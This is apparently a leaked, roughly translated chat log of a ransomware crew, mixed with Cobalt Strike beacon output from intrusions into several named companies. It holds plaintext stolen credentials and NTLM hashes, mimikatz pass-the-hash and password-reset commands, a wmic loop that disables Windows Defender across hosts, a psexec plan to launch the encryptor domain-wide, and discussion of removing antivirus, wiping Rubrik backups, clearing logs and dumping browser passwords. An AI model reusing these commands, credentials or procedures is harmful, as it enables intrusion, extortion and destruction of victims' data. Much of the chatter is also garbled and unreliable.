Tasked beacon to run net domain [+] host called home, sent: 257 bytes ``Domain is not responding there is a session in cobepop)`` on the external domain since they even have passwords repetition the internal one is the same? http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx What domain did you have? Check if there is a pschhe I typoed or what? 
If it does not appear, then the socket server has failed and you will not have interactivethe bottom left of the window pops up sockets coopedd when logging in the pschhe who have not noticed the pricholbytnu thin or moderately delayed in 5 characters go or so it also dies?write with your hands and you don't copy it, it stops responding after trying to insert it try to run powershell.it doesn't respondkmda it doesn't write so in general tpsh domain pinged visible or dasgenerate a new onethis then write with your hands if you don't copypaste the loadpaste what are you trying to do?but the load doesn't paste something i clicked and it's been 5 minutes since then3 item super-duperper? below enter? something on elfiskom if it didn't paste mb not copied3 top after enter+win10?on my car the pcm doesn't work in kmd call the menu on your axis and see what item you have pasted then open cmd on your car I don't think (P) just find out what's in it. notepad.exe >> file >> open >> C:\system32 >> cmd.exe >> pcm >> gcnp right here write back as done@user7 help kmd what's erp, oa? I put everything that was run analogues? no access to directories, too. Of available only mozilla and some little things like Word and Isis. 
no shells:thumbsup:@user8 ``` http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx leon leon20180928 http://citrix.peptide.cn:81/citrix/xenapp/auth/login.aspx mason peptide*))8 http://citrixen.peptide.cn/citrix/xenapp/auth/login.aspx leon leon20180928 http://citrix.peptide.cn:81/citrix/xenapp/auth/login.aspx ethan.yu peptide1 http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx dgs00318 peptide1* http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx ethan.yu peptide1* in this case there is something to work with) already told@user3 will tell us there is a variant of loading the script in the memory of the ps itself in the tpc file run is always disabled in fact i will try in the tpc import yet in problems - command, output already said i tried to import ps1 script by rd and run it writes disabled by the admin what does it mean to disable import and run if tpsh arrives? at least i tried to rdp in ps to do it kst, there is a neuter smblogin for ps anyway check hit then most likely already going back timer)no well it's possible, but i think i already made a noise)and when you start to make noise will not come?)polzak is dead, no his files 1) psh on the rpd, you hold a session polzak and if he flies in and sees the open psh and stuff will be unpleasant 2) tpsh can scan hosts by hash, check git@tl1 i can use that dll you gave me yesterday ?@tl1 Give me a clean cryptor devry.edu ``` Coba and arma are not attracted (in all likelihood some iron blocker traffic) Attracted tpsh, but what's the point of it if I have rdp psh attracted msf, raised the system on a virtual machine tried to scan network, session with a route or forwarding almost immediately dies Same with brute force on LA - roth and portfwd kill the session Broot on LA, each time resetting session, there is LA only on the same virtuals useless ms17 kills it right away. 
I'm in the middle of a stalemate, thank you@user7 ``` https://ucfapps.cloud.com/citrix/storeweb/ je517380@ucf.edu Sawgrass20@ ``@user4 ``` https://studentappst.asu.edu/vpn/index.html egomez34 Pupilo10169! ``Create the group cpcc.edu I'm not there I'm not there all have tasks? hello everyone good evening. thanks. i'll read it) it's something like salted hashes and then some fuckers it says "brutte" but i must have brutted two for all time))))))))))) keep the article http://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-cheap ((it's mscache tvot such crap$DCC2$10240 seme format how to distinguish mscache2 no more there are several cars, I want there too remove this wine10 and apparently without local admin is the option where else to poke? it's a pain in the ass they don't really fuckin' brute force anything i see mscache2 it's the same ntlm only right SMB 10.0.0.149 445 SCCY-17 SCCY\SCCY-17$:aad3b435b51404eeaad3b435b51404ee:8b90ea2112c039acd811d39829c113e6:: ``there are different people saying they still need to brute force them? ``` https://security.stackexchange.com/questions/185546/using-windows-lsa-hashes-obtained-from-crackmapexec you guys are so cool over there already impacked what's wrong? = i already asked you that, but i don't remember your answer.) What can be done with this ``` user@user-tobefilledbyoem:~$ proxychains cme smb 10.0.0.149 -d sccy -u qc -p secure4qc --lsa [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/libproxychains4.so [proxychains] DLL init: proxychains-ng 4.14-git-25-g486f820 [proxychains] Strict chain ... 64.187.238.58:15452 ... 10.0.0.149:445 ... OK [proxychains] Strict chain... 64.187.238.58:15452 ... 10.0.0.149:445 ... OK [proxychains] Strict chain... 64.187.238.58:15452 ... 10.0.0.149:135 ... OK [proxychains] Strict chain... 64.187.238.58:15452 ... 10.0.0.149:445 ... OK [proxychains] Strict chain... 64.187.238.58:15452 ... 
10.0.0.149:445 ... OK SMB 10.0.0.149 445 SCCY-17 [*] Windows 10.0 Build 18362 x64 (name:SCCY-17) (domain:sccy) (signing:False) (SMBv1:False) [proxychains] Strict chain ... 64.187.238.58:15452 ... 10.0.0.149:445 ... OK SMB 10.0.0.149 445 SCCY-17 [+] sccy\qc:secure4qc (Pwn3d!) SMB 10.0.0.149 445 SCCY-17 [+] Dumping LSA secrets 
```patykr``` Administrator ``` kk send it, hi! you can put a rasash for netntlm I caught some stuff in there...no? 
for /f %%i in (ip.txt) do (copy wdoff.bat \\\%%i\C$\ProgramData && wmic /node:%%i process call create "cmd /c wdoff.bat") `````` NEW NTLM : 04ddcbb1734a5a868580438cb75d7c2c `````` pth ITC\br_admin 555601b2d489ec2bfb7d189544736c8b mimikatz lsadump::changentlm /server:ITC.local /user:Administrator /old:0cc0cdacd8aa7f3b06e7cdfffa909b11 /newpassword:CAKE@horse369!@@321 ``make_token itc.local\br_admin CAKE@horse369!@@.`` Administrator bkupsvc br_admin bu_veeam eagle egl_admin egladmin egltech nk_admin PassportalSync paustin SLEAdmin superlogin vmware aadsync ````mimikatz lsadump::changentlm /server:sprouselaw /user:aandaservice /old:1737a8ca4966a1b4cf767232b0a4bd58 /newpassword:jackc!76DF37bd` new password for YES ``CAKE@horse369!@@321``Are we ready to start? ``` 1. pinging live WS. 2. Disable WinDef 3. Uninstall starter on WS + shut down Malware. 4. Spread starter on servers (in system32), except DC. On servers with SQL we stop SQL processes manually (net stop mssqlserver) or kill them. Run the starter manually. 5. Run starter domain-wide (psexec \\* -d -s -h start.exe -accepteula -y) 6. Extinguish DC ``EA: ``` * Username : egl_admin * Domain : ITC * Password : E@gle@x1s3030 ``` DA: ``` * Username : br_admin * Domain : ITC * Password : CAKE@horse369!@@ ``? or is there another one? 
Use KCunZoziQUNQQoJta54VhbE7Y8PD8FPDSGWulQ3gvxuiG7SFE4tGY4mHcaYmlFZM2107.161.126.162:15127 XloTvJNB02:51 PMsimple time here it does not crush our exe malwarebytes is installed on several servers (not BOLO) - uninstall it everything fresh pings and we can stop now? so what do we have here? so any list including password sqlpassword sa sa1 P@ssword Try that popular passwords there are usually no specific polices on "sa" accounts-tried to brute force "sa" accounts on skulls ? SQL Process: ITC-SQL01.ITC.LOCAL 10.0.0.16 ITCMA-SQL02.ITC.LOCAL 10.0.0.81 ITC-SHIP01.ITC.LOCAL 10.0.0.18 ITCMA-RDS01.ITC.LOCAL 10.0.0.8 ITCMA-FILE01.ITC.LOCAL 10.0.0.39 ITC-DC-SVR01.ITC.LOCAL 10.0.0.14 ``Let's do a little work on the rest of them now @tl1 is coming and let's get started @Tl1 @tl2What's up? are we starting? on the rdp went to the server to look at the malware, no ill did not make any noise?it's not cloudy I'm talking about launching it does not swear at startup, check the browser does not swear at the exea so on the fact of launching the cloud will fuck up and on 90% of the boot will chop the browser on the fact of loading or on the startup? 192.168.0.227 ``` DisplayName : Malwarebytes Anti-Malware version 1.80.2.1012 DisplayVersion : 1.80.2.1012 Publisher : Malwarebytes Corporation InstallDate : 6/13/2019 12:00:00 AM Architecture : x86 DisplayName : Malwarebytes Anti-Exploit version 1.13.2.283 DisplayVersion : 1.13.2.283 Publisher : Malwarebytes InstallDate : 10/14/2020 12:00:00 AM Architecture : x64 ``ITCMA-FILE01 10.0.0.39 ``` DisplayName : Malwarebytes Anti-Malware version 1.80.2.1012 DisplayVersion : 1.80.2.1012 Publisher : Malwarebytes Corporation InstallDate : 6/13/2019 12:00:00 AM Architecture : x86 DisplayName : Malwarebytes Anti-Exploit version 1.13.2.283 DisplayVersion : 1.13.2.283 Publisher : Malwarebytes InstallDate : 10/13/2020 12:00:00 AM Architecture : x64 yes it seems, just the opposite when? always disconnected aposto mcafee as well? 
it is likely to catch on the dynamics in particular, now interested in malwarebytes bad enough@tl1 do we have statistics, how do antiviruses treat our builds? about the build for lin question, we should clarify so if everything is ready here, put the build> In the end, what is done is done. Yes, I just do not want to be and then there were discussions on this subject1) just look for accesses, keys, sessions in the system from the cars techs 2) check accesses and leave no traces 3) See what we need 4) clean the logs for themselves if we're talking about working with linux xschnu means control through the scheme does not require a browser And if it had not done so would not have known NEVER That's all There's fucking authorization just look what is there That we do not watch the history of all browsers and not authorized in the LC why *Browser admin) what have not checked?It would not have been checked))) The point is that because they were in a hurry and did not check it, it remains a mystery 50 to 50-50 it's a finger in the sky 50/50 may well have been. that there may have been key nodes in the organization in those domains? ``` There might not have been key nodes in those domains? what diap was scanned? that there might have been key nodes in the organization in those domains? what does that tell you? Can you explain without making assumptions, does having a couple more domains tell you anything? no more And this is all just your guesses Outsourced accounting yf jnenjhst scale of 20 pc? accounting and offices if not dead yet, it at least has a logistics company has been around for half a century http://www.pkgprod.com/our-history/ but yeah lasset he has earlier``? 
pwdlastset : 8/17/2020 4:36:45 PM mailnickname : Louisad `````` pwdlastset : 7/4/2013 2:00:27 PM `````` [*] 10.7.20.80:445 - 10.7.20.80:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323', [*] 10.7.20.120:445 - 10.7.20.120:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323', [*] 10.7.20.70:445 - 10.7.20.70:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323', [*] 10.7.20.30:445 - 10.7.20.30:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323', [*] 10.7.20.190:445 - 10.7.20.190:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323', [*] 10.7.20.120:445 - 10.7.20.120:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323', ``a well lassset''. whencreated : 5/20/2014 11:39:09 AM samaccountname : Louisad ``Well, there ``couldn't be a 2020 there since ``` mdbusedefaults : True whencreated : 7/4/2013 12:00:27 PM name : Veeam Backup badpwdcount : 0 useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD usncreated : 46175 primarygroupid : 513 pwdlastset : 7/4/2013 2:00:27 PM `````` M@tches2020! M@tches2020! M@tches2020! Matches2014 matches123 matches123! matches123!!! m@tches123 m@tches123! m@tches123!!! Matches123! Matches123! Matches123!!! M@tches123 M@tches123! M@tches123!!! Dinham2323! Dinham2323! Dinham2323!!! Dinh@m2323! Dinh@m2323! Dinh@m2323!!! ``what was the vocabulary? I can't know, ``net accounts /dom`` don't work out... how many failed attempts were there? that's too bad``. [-] 10.7.20.30:445 - Account lockout detected on 'Veeam', skipping this user. `````` [+] 10.7.20.30:445 - 10.7.20.30:445 - Success: 'matches.com\Louisad:M@tches202020! [+] 10.7.20.55:445 - 10.7.20.55:445 - Success: 'matches.com\Louisad:M@tches202020!!!' [+] 10.7.20.60:445 - 10.7.20.60:445 - Success: 'matches.com\Louisad:M@tches202020!!!' [+] 10.7.20.70:445 - 10.7.20.70:445 - Success: 'matches.com\Louisad:M@tches202020!!!' 
[+] 10.7.20.80:445 - 10.7.20.80:445 - Success: 'matches.com\Louisad:M@tches202020!!!' [+] 10.7.20.120:445 - 10.7.20.120:445 - Success: 'matches.com\Louisad:M@tches202020!!!' [+] 10.7.20.190:445 - 10.7.20.190:445 - Success: 'matches.com\Louisad:M@tches202020!!!' ``Run the relay with a command like - powershell -nop -exec bypass -EncodedCommand not understood about the allnailer team) We caught a couple of users yesterday does it make sense to run invei relay with the invei team? and give me a list of processes from her pc still scan the mercedes creeds, maybe he where an admin put + brute force users from this group `CN=sec_WorkstationLocalAdmin` try to scan that admin with a dot ``. [+] 10.7.20.30:445 - 10.7.20.30:445 - Success: '.\Louisad:M@tches2020! ``See if there were any hooks to their skul servers Didn't you shoot/search for them? There are 3 polzak, try it-this group was brutalized? `CN=sec_WorkstationLocalAdmin` No `Microsoft SQL Server 2012 Native Client` anything from here? 
Microsoft Dynamics NAV RoleTailored Client 7.1.36703.0 Microsoft Dynamics NAV Setup 7.1.36703.0 British Module for Microsoft Dynamics NAV Role Tailored Client 7.1.36703.0 Office 16 Click-to-Run Extensibility Component 16.0.11929.20606 Office 16 Click-to-Run Localization Component 16.0.11929.20606 Office 16 Click-to-Run Licensing Component 16.0.11929.20606 Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40660 12.0.40660 Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 10.0.40219 Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219 HP Support Solutions Framework 12.13.42.1 Microsoft SQL Server 2012 Native Client 11.0.2100.60 Open XML SDK 2.5 for Microsoft Office 2.5.5631 ESET Endpoint Encryption 5.0.0.0 CarbonBlack Sensor 6.2.1 Jet Excel Add-In 16.1.17061.0 Microsoft System CLR Types for SQL Server 2012 11.0.2100.60 Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40660 12.0.40660 ESET Management Agent 7.0.577.0 Microsoft SQL Server 2005 Analysis Services ADOMD.NET 9.00.3042.00 Local Administrator Password Solution 6.2.0.0 Adobe Refresh Manager 1.8.0 Adobe Acrobat Reader DC 20.012.20048 Configuration Manager Client 5.00.8913.1000 Netop Remote Control Host 12.83.20175 Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40660 12.0.40660 Google Update Helper 1.3.35.451 Microsoft Report Viewer 2012 Runtime 11.1.3010.3 Microsoft Visual Studio 2010 Tools for Office Runtime (x64) 10.0.50330 Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40660 12.0.40660 FortiClient 6.0.9.0277 Microsoft Policy Platform 68.1.1010.0 ``Try set .it's default as .so it's default as WORKSTATION maybe? I didn't specify any domain just it says here with "." and there with workstation `` [+] 10.5.6.21:445 - 10.5.6.21:445 - Success: '.\conn-selmer:&Green27!' [+] 10.4.1.113:445 - 10.4.1.113:445 - Success: '.\conn-selmer:&Green27!' [+] 10.1.7.226:445 - 10.1.7.226:445 - Success: '.\conn-selmer:&Green27!' 
[+] 10.1.6.6:445 - 10.1.6.6:445 - Success: '.\conn-selmer:&Green27!' [+] 10.1.7.224:445 - 10.1.7.224:445 - Success: '.\conn-selmer:&Green27!' [+] 10.1.7.192:445 - 10.1.7.192:445 - Success: '.\conn-selmer:&Green27!' `` but with . but with '.''? Pinging UKHECSLT3028.matches.com [10.20.4.4] with 32 bytes of data: Request timed out. Request timed out. ``This admin was not enabled at all on the Mercedes, I gave him this password UKHECSLT3028 and it is visible? and with these accesses checked? [+] 10.7.20.30:445 - 10.7.20.30:445 - Success: 'matches\Louisad:M@tches2020! [+] 10.7.20.60:445 - 10.7.20.60:445 - Success: 'matches\Louisad:M@tches202020!!!' [+] 10.7.20.55:445 - 10.7.20.55:445 - Success: 'matches\Louisad:M@tches202020!!!' [+] 10.7.20.70:445 - 10.7.20.70:445 - Success: 'matches\Louisad:M@tches202020!!!' [+] 10.7.20.80:445 - 10.7.20.80:445 - Success: 'matches\Louisad:M@tches202020!!!' [+] 10.7.20.190:445 - 10.7.20.190:445 - Success: 'matches\Louisad:M@tches202020!!!' ``She didn't have winscp,ftp,putty,teamviewer...? then so far all the scans that have access and open 445 just hung file 0b and that's it ``regression-app-portal.matcheslocal.com [10.5.53.111]``what hosts did you check on ms17? did you check all the trusts? i.e. you didn't try on ms17? and what hosts did you check? did you only scan 2003? did you add his password to the brute force dictionary for yes? did you write "." did you write workstation? and with the admin account i assume the same situation? for the test do a couple of hosts, ok try it with the domain in this case you found it registered outside the domain, which is strange he may be registered as LA with a domain account somewhere) if you put the domain, it is clear he will write Success everywhere) we scanned the local admins in the domain put "." 
or so I do not understand it and did not write in Conn-selmer, and gave out with the admin did not write Just these should be his valid credentials and it everywhere to be as Success without an admin a you when you scanned the domain did not write?aha)ah, well he's not an admin there didn't you go there? did you check this account did you check other hosts as LA? and what's the polzak and what kind of machine? and the sloits about exec want SA with the password they sql 2017 stands brute force -brute force sploit -dav in principle and on our deck on their network, too it's about scan from the deck under vpn om sploits by? on her machine - yes so we have tried everything? just wait?) she computer reboot rarely (27 last time), and go on rdp and turn it on the vpn only option that we can do with this machine No, + maximum palevosti U on her pc is enabled NLA - on rdp does not allow to connect We disabled it through the registry, but we have to reboot the computer for the changes to take effect. if we reboot her computer and after the reboot will hang authorization window - our session will not come? mbh on the use of psh no I did not stay long and did not have time to review something by the way when the load tpsh ran, I just what just try to respawn or do not risk to rdp to climb?in the cob the session sagged, in the tpsh not responding why strange? rights just do not exist ... strange admin's balloon is only on the current machine `` [*] Parsed 39 computer objects. 
``Serious policies by the way. Force user logoff how long after time expires?: Never Minimum password age (days): 1 Maximum password age (days): 42 Minimum password length: 8 Length of password history maintained: 2 Lockout threshold: 5 Lockout duration (minutes): 3 Lockout observation window (minutes): 3 Computer role: PRIMARY ```:zany_face:``we've been exposed finita la comedy with dns cache in the sitbelt was``. Entry : wikibros.com Name : wikibros.com Data : 23.106.160.61 Entry : wideio.com Name : Data : Entry : wideio.com Name : wideio.com Data : 23.19.227.186 The ``check #general``. Get-PSReadLineOption The term 'Get-PSReadLineOption' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. ``You're welcome to see history file path or something like that after execution. Can you remind me the command to clean the psh, please? ok, ok, work until you get to the psh? ``` C:\Users\Healdton.IT\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://login.zirmed.com/,https://login.zirmed.com/ui/Login/Failed,2/20/2020 8:46:37 AM,13226683597880246,tpchcclay,PCH@2019! 
No kerbs, no rubus (kerb, asrep), no invoc kerb found anything can you continue to report the results of the work ahahahahaha is now will remove the kerbs Net-GPPPassword did not give anything just reported the situation I did not say that there is nothing and do nothing but the car in the domain and it opens a lot of vectors current car - the server, but I am not LA there` `` Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- dsechrist kkohl ``` ``` Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- dsechrist kkohl ``` ``` Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- dsechrist STG-HEALTHCARE\Domain Admins ``I'm looking in the gui, there is a place to paste, but where do I take it? Maybe the name of the item is not obvious? Well, look directly through the gui implementation of Sharpview there I can't remember the parameter transfer(? I don't know how to do it... it's not in the domain, it's in the .cna gueta where you can set it, just poke the menu in the sharpview gui and it will show you the right string with the creds... why? For sharpview I found ``` $SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Get-DomainUser -Credential $Cred ``` but how to use this from a coba is not clear at all...NON-DOMAIN ``` SCCY-MODUSLT SCCY-PRODUCTION VANNDATA DESKTOP-GP0L2NF DESKTOP-15BLUKS DESKTOP-TEODH7E 0EA78803 The second one has a lot of links to shared resources. 
In general, these satellites are more like filewashing sites. the one that has the craps has a capacity of 1Tb what is there at all? History (VDSADMIN): https://huntress-installers.s3.amazonaws.com HuntressInstaller.exe `````` User: sccyadmin - IP Address: 10.0.0.6 User: VannData - IP Address: 10.1.4.205 ``This is us between us and where? 10.1.4.175 admin:vanndatashmamdata ``NAS ``` 10.1.4.175:80 10.0.0.51:80 datto control center 10.0.0.4:80 ``ts sccy-fs mfgwin10-1 http://10.0.0.200:8000/,http://10.0.0.200:8000/,11/16/2020 10:39:56 AM,13250014796840092,, http://10.0.0.202/,http://10.0.0.202/,12/2/2020 3:53:53 PM,13251416033085523,, http://10.0.0.21/NETGEAR R8000P,http://10.0.0.21/,1/11/2021 4:01:07 PM,13254872467540386,, `````` * Username : vdsadmin * Domain : SCCY * Password : T@ng0D0wn! ``` ``` User : vdsadmin - IP Address : 10.0.0.75 User: VannData - IP Address: 10.0.0.5 ? ``want to get the account from here. huntress. i give you a link to the softs QR Go to the link What kind of protection? a conspiracy of lokers it is protection from lokers see we are not the first)) they found on their computer, what is it? ``` * Username : JamesD * Domain : SCCY.LOCAL * Password : Jd07101995 * Username : toy * Domain : SCCY.LOCAL * Password : 2Pink4u123 * Username : karend * Domain : SCCY.LOCAL * Password : Karrie10! * Username : qc * Domain : SCCY * Password : secure4qc * Username : davidd * Domain : SCCY.LOCAL * Password : Monksman1! 
``YES`` ``` InstallA NOC_HelpDesk Passportal_Srvc VannData vdsadmin ``` EA ``` InstallA VannData vdsadmin ``` SA ``` InstallA sccyadmin ``It's not certain, but it's very likely that they are not available at third-party services ?waiting for the list of external backups yet to close user8 user3 I'm waiting for the codes from nasov tut to close today ? ``` ``Let's take our time to prepare and close down little by little, how much is that? Well, shall we start little by little? https://www.lets-talk-about.tech/2018/03/rubrik-reset-brik-to-factory-default.html checking) it's a little early 206.221.188.106:38824 then close down little by little, the servers are still being restored via rubrik I propose to reset the passwords on the cx, erase rubrik and encrypt all over again They restore everything from it, and the storage of backups there too but there's a problem in the form of `` anti_ransom.exe ``` - put on some servers. seems to bite, cuts the launch dll. the idea is to go around the rdp and remove or disconnect the rest of the televisa last session fell off today - tv, yesterday's nets from the vpn and the current @user3 Well, just ate lunch rolls. the question was where are we wasting our time in general, I'm not talking about this network in a network where 21k npc are the quietest ways shaprhoud\accesses to shampeople\shaprhoud\accesses to shampeople\gather comps and servers where to bruteforce on la to tell me differently what other info are you spending time while hell is gathering?) did not have time (rubeus I always run after collecting information + where are the hashes? manually gather would be quieter why tulchain domain DK nu always started with this (YES LA EA adinfo) the question is why the fuck do I know that this is from tulchain and I know what or how it is connected, but after the addfind files and the archive started downloading the session died Why use it? 
```
[*] Tasked beacon to run .NET program: check.exe adflogs
[+] host called home, sent: 110661 bytes
[+] received output:
333301283
[*] Tasked beacon to run .NET program: check.exe adflogs
[+] host called home, sent: 110661 bytes
[+] received output:
398533948
[*] Tasked beacon to run .NET program: check.exe adflogs
[+] host called home, sent: 110661 bytes
[+] received output:
437262015
```
Why is it definitely dead now? (-from mathem.local there are still live sessions?)
It's too big, if you work with it don't fuck it up
```
Group name     Domain Admins
Comment        Designated administrators of the domain

Members
-------------------------------------------------------------------------------
bbt0097                  reconwindomp             suQARSp_admin
suWATprod
The command completed successfully.
```
I spammed a new one, try it yourself
there is only 1 session at all, do any command and it dies
spamming session
banally ask DA and the session dies
everything is bad, just terrible, does not give anything to do
all who have problems go to this cob and work from there
```
flexzap.com
192.254.78.106:30504
sUSsQS7WpevaVL12GSMXs8Z10cXXski8ins
```
cannot use elevate @tl1
In the new cob from the user it does not give anything to do
```
[-] could not spawn C:\WINDOWS\sysnative\wusa.exe: 740
[-] Could not connect to pipe: 2
```
hi :space_invader:
Hi
Hi
Hi
Hi
Hi, there was one this morning, anyone still have the files?
you need to know how to do this. it's the only method to dump chrome without a session on the machine
we dumped the masterkey, and it's not coming, so we're trying to dump the masterkey with the file
That's not a backup, huh?
I wonder what clupload has to do with it... Whatever, so do it.
and offline solved the problem
I threw how to pull chrome through DPAPI
found a user masterkey that goes to the malware
well, to decrypt the DPAPI content of chrome in sharpchrome, can the master-key somehow work?
maybe from it a folder OutLook, I don't know, it doesn't say anything...
and sitbell search for credentials came up: login credentials.jpg
```
C:\Users\johni\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\58CKFMPE
```
What is this and where does it come from?
Search for cloud storage access further in the browsers, which software accesses these clouds, and then find out what it is and understand what it is: NAS/network hardware or what
see what admin is hanging out there and blow on the 80/443 ports to figure out what's up with the host already
i'm thinking how the hell it was!!!!!!!!!
it's on d
```
ls \\hostname\d$
```
gives an output or what?
I do not know how to comment on the attempt to copy to an inaccessible dir; what to do in this case is obvious in my opinion, sorry
it's all open ports
3389 can be checked in AD
you can check what OS, what's still open?
if the drive C does not exist - there can only be one fucking obvious assumption)
it's not even an error to correct you, somewhere you try to copy the file to a non-existent dir
I do not know what to add, you are so verbose ...
```
(ICMP) Target '192.168.100.97' is alive. [read 8 bytes]
[+] received output:
192.168.100.97:443
[+] received output:
192.168.100.97:80
192.168.100.97:22 (SSH-2.0-dropbear_2014.63)
```
Scan to everything.
```
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 01:00:27> shell dir \\desktop-33jh80d.sprouselaw.com\c$
[*] Tasked beacon to run: dir \\desktop-33jh80d.sprouselaw.com\c$
[+] host called home, sent: 70 bytes
[+] received output:
The network path was not found.
```
22
shell dir \\desktop-33jh80d.sprouselaw.com\c$
already tried
445
which ports can be scanned?
```
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:58:27> shell net view \\desktop-33jh80d.sprouselaw.com
[*] Tasked beacon to run: net view \\desktop-33jh80d.sprouselaw.com
[+] host called home, sent: 72 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.
```
same kind of ballyhoo then so yeah.
```
Name:    desktop-33jh80d.sprouselaw.com
Address:  192.168.100.97
```
that's his host, the one you threw in is the DC \\zion.sprouselaw.com
but try the hostname
```
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:49:54> shell net view \\192.168.100.97
[*] Tasked beacon to run: net view \\192.168.100.97
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.

usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:53:59> shell ping 192.168.100.97 -n 1
[*] Tasked beacon to run: ping 192.168.100.97 -n 1
[+] host called home, sent: 55 bytes
[+] received output:

Pinging 192.168.100.97 with 32 bytes of data:
Reply from 192.168.100.97: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.100.97:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:54:48> shell nslookup 192.168.100.97
[*] Tasked beacon to run: nslookup 192.168.100.97
[+] host called home, sent: 54 bytes
[+] received output:
Server:  zion.sprouselaw.com
Address:  192.168.100.240

Name:    desktop-33jh80d.sprouselaw.com
Address:  192.168.100.97
```
I don't know what to do, there is no view on the host/ip
well, scan the win ports
How can you check this?
I'm not sure of anything in life
so how do you copy to a folder you can't see?
are you sure it's a win machine?
@user8 from any machine, as long as the machine sees all domain controllers
```
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:44:06> ls \\192.168.100.97\C$\
[*] Tasked beacon to list files in \\192.168.100.97\C$\
[+] host called home, sent: 37 bytes
[-] could not open \\192.168.100.97\C$\*: 53

usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:44:50> ls \\192.168.100.97\C$\ProgramData
[*] Tasked beacon to list files in \\192.168.100.97\C$\ProgramData
[+] host called home, sent: 49 bytes
[-] could not open \\192.168.100.97\C$\ProgramData\*: 53
```
Sure it works on any machine, or is it better with the DC?
Is the folder accessible? And with ls \\192.168.100.97\C$\ProgramData
@tl2
```
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:41:13> shell copy C:\ProgramData\updates.dll \\192.168.100.97\C$\ProgramData\
[*] Tasked beacon to run: copy C:\ProgramData\updates.dll \\192.168.100.97\C$\ProgramData\
[+] host called home, sent: 95 bytes
[+] received output:
The network path was not found.
        0 file(s) copied.
```
@user7 for what reason? What failed?
192.168.100.238
```
+ I connected and it just froze, then I couldn't get the dll on it
192.168.100.97 -
192.168.100.98 -
192.168.100.99 -
192.168.100.94 -
192.168.100.95 -
```
couldn't get on these machines
http://habr.com/ru/post/434514/
```
Mitel/192.168.100.235twd/jyhu\judy sprouse350
Mitel/192.168.100.235twd/ccolumbus\christinec changeme
```
```
How to use VPN
1. Double-click the VPN icon on the Desktop
Skip (2. Double-click 38.68.2.51)
3. Enter username JeffH (case sensitive)
4. Enter password Sprouse20!
5. Click OK
---------------
6. When finished, right-click 38.68.2.51 > click Disable
7. Close the VPN window.
```
PasswordsPlus is installed on the DA computer.
@user9 well, if you can see the login there - it makes sense to try any other creds with the login of this user
+
Does it start without comma?
```
remote-exec psexec 192.168.100.103 rundll32 C:\ProgramData\1580759637.bdinstall.dll entryPoint
shell copy 1580759637.bdinstall.dll \\192.168.100.103\C$\ProgramData\
```
Look for notes from this username
@tl2 found a computer where the admin goes to https://cloud.malwarebytes.com/ but it won't unlock the chrome credentials. tried with dpapi:chrome and sharpchrome, prints out empty passwords.
Pay special attention to possible backup systems.
matts-pc [192.168.100.93]
```
beacon> pth SPROUSELAW.COM\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:aandaservice /domain:SPROUSELAW.COM /ntlm:1737a8ca4966a1b4cf767232b0a4bd58 /run:"%COMSPEC% /c echo 2e8d2fa8e2b > \\.\pipe\4fee59" command
[+] host called home, sent: 23 bytes
[+] host called home, sent: 438863 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user    : aandaservice
domain  : SPROUSELAW.COM
program : C:\WINDOWS\system32\cmd.exe /c echo 2e8d2fa8e2b > \\.\pipe\4fee59
impers. : no
NTLM    : 1737a8ca4966a1b4cf767232b0a4bd58
  |  PID  11124
  |  TID  8532
  |  LSA Process is now R/W
  |  LUID 0 ; 1696015470 (00000000:6517246e)
  \_ msv1_0   - data copy @ 00000275420FFA80 : OK !
  \_ kerberos - data copy @ 000002754222D6C8
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 000002754218E768 (32) -> null

beacon> shell copy x64.dll \\192.168.100.227\C$\ProgramData\x64.dll
